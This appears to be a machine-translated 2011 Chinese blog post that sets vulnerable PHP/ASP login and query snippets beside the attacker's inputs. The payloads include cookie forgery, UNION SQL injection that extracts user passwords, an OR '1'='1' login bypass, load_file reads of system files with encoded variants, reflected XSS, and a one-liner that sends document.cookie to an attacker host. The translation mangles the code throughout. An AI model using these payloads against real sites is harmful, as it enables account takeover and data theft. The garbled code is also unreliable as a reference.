// Friday, 2011-11-11
// Php programmer's thinking:
// Login. php --- code snippet
If ($ adminuser = $ user and $ adminpass = $ pass)
{
Setcookie ("login", "yes", time () + 3600 );
Header ("location: admin. php ");
}
// Our thinking:
Javascript: alert (document. cookie = "login =" + escape ("yes "))
######################################## ####################
// Asp programmer's thinking:
// Code snippet
<%
If Request. cookies ("xxx") ("user") = "" or Request. cookies ("xxx") ("admin_pass") = "" or Request. cookies ("xxx") ("admin_class") = "" then
Response. Cookies ("xxx") ("user") = ""
Response. Cookies ("xxx") ("pass") = ""
Response. Cookies ("xxx") ("admin_class") = ""
Response. redirect "ad_login.asp"
Response. end
End if
%>
// Code snippet -- identify
<% If rs ("admin_class") = 0 then response. write "selected" %> admin
<% If rs ("admin_class") = 1 then response. write "selected" %> user
<% If rs ("admin_class") = 2 then response. write "selected" %> guest
// Our thinking:
Admin_class = 0
Conclusion: It is often quick and convenient, and destined to embark on the road of death.
Php instance expansion: Here I will reference an example of the soul of the ox:
// Code snippet
If ($ go) @ list ($ job, $ itemid) = @ explode ('_', basename ($ go ));
// Omitted
The original injection statement is
Index. php? Go = category_0) union select 1, concat (userpsw) from boblog_user % 23
// Omitted
If a cow is successfully injected, the MD5 password is not required to run.
Direct
Setcookie ('userid', '1 ',);
Setcookie ('userpsw', 'md5 ciphertext ',);
// Saturday 2011-11-12
// Programmer's thinking:
// Index. php --- code snippet
<? Php
$ Micropoor = $ _ GET ['micropoor'];
Print $ Micropoor;
?>
// Our thinking:
Index. php? Micropoor = <script> alert (document. cookie) </script>
######################################## ####################
// Programmer's thinking:
// Index. php --- code snippet
<Html>
<Body>
//...
<Input name = "Micropoor" value = "<? Php echo $ _ GET ['micropoor'];?> ">
//...
</Body>
</Html>
// Our thinking:
Http: // 127.0.0.1: 81/index. php? Micropoor = "> <script> alert (document. cookie); </script>
######################################## #######################
// Programmer's thinking:
If the programmer filters the <script> </script> tag, this js Code will not be executed on the page.
// Our thinking:
the src tag of img points to the image URL of a web server.
But it can also be replaced with:
Others: hexadecimal conversion, mixed characters, encryption, etc.
######################################## #####################
// Length of Breakthrough:
The following 28-byte command will send your cookie to the server with the Host Name micropoor.
Open ("// micropoor/" + document. cookie)
If HTML is injected directly
The following 30-byte label will load and execute a script from the server with the Host Name micropoor.
<Script src = http: // micropoor> </script>
Knowledge Development:
1. directly use the JS script.
2. transcode the JS script.
3. Use the tag trigger condition to insert code and perform transcoding.
4. Write with hexadecimal notation
Two types:
Stored XSS
Reflected XSS
News is news. The knowledge cannot be further explored.
Conclusion: All inputs are harmful.
// 2011-11-13 Sunday
// Programmer's thinking:
// Micropoor. php --- code snippet
<? Php
$ Id = $ _ GET ['id'];
$ Query = "SELECT * FROM users WHERE id = '". $ id .";"
// Omitted
?>
// Our thinking:
Index. php? Id = 1 + UNION + SELECT + 1, @ version + from + users --
// Programmer's thinking:
// Micropoor. php --- code snippet
<?
$ User = $ _ POST ['user'];
$ Pass = $ _ POST ['pass'];
$ Link = mysql_connect ('localhost', 'root', 'pass') or die ('error: '. mysql_e
Rror ());
Mysql_select_db ("SQL _inj", $ link );
$ Query = mysql_query ("SELECT * FROM SQL _inj WHERE user = '". $ user. "' AND pass = '". $ pass. "'", $ link );
If (mysql_num_rows ($ query) = 0 ){
Echo "<scripttype = \" text/javascript \ "> too many location.href='micropoor.html '; </SC
Ript> ";
Exit;
}
$ Logged = 1;
?>
// Our thinking:
$ User = 1 'OR '1' = '1
$ Pass = 1 'OR '1' = '1
News is also crazy: MySQL built-in functions in SQL statements often use DATABASE (), USER (), SYSTEM_USER (), SESSION_USER (), CURRENT_USER () to obtain the information you want. Oh, by the way,
There is also load_file ().
// Programmer's thinking:
// Micropoor. php --- code snippet
// Note: Current Condition: magic_quotes_gpc = off, root
SELECT * FROM article WHERE articleid = $ id
// Our thinking:
-1 union select, load_file ('C:/boot. ini ')
// Deteriorated:
SELECT * FROM article WHERE articleid =-1 union select, load_file ('C:/boot. ini ')
// Our thinking is transformed into: (char function)
-1 union select 111,111,116, 1, load_file (char (46,105,110,105 ))
// Continue the transformation:
SELECT * FROM article WHERE articleid =-1 union select 1, 1, load_file (0x633a2f626f6f742e696e69)
Conclusion: If you don't let me go, I will jump to the wall.
From http://hi.baidu.com/micropoor